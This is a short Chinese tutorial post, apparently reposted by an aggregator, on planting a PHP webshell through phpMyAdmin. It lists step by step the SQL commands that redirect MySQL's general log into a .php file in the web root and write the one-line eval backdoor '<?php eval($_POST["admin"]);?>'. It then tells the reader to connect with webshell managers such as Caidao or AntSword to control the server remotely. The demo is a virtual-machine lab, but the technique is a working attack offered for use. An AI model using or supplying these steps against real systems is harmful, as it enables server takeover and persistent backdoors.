phpmyadmin通过日志写入一句话
Posted 二月三十的博客
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了phpmyadmin通过日志写入一句话相关的知识,希望对你有一定的参考价值。
行代码步骤如下,后面有详细步骤。
show global variables like \'%general%\';
set global general_log=\'on\';
set global general_log_file=\'C:/phpStudy/PHPTutorial/WWW/yanshi.php\';
show global variables like \'%general%\';
select \'<?php eval($_POST["admin"]);?>\';
以虚拟机搭建环境为例:
首先能够登录到对方的phpmyadmin后台。
链接:http://192.168.36.131/phpmyadmin/
输入相应的账号密码登录。
输入:show global variables like \'%general%\';
点击执行
set global general_log=\'on\';
set global general_log_file=\'C:/phpStudy/PHPTutorial/WWW/yanshi.php\';
输入查看是否更改:show global variables like \'%general%\';
写入一句话日志:select \'<?php eval($_POST["admin"]);?>\';
打开远程连接工具菜刀、蚁剑等进行连接。
现在就可以远程控制虚拟机服务器了。
以上是关于phpmyadmin通过日志写入一句话的主要内容,如果未能解决你的问题,请参考以下文章
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)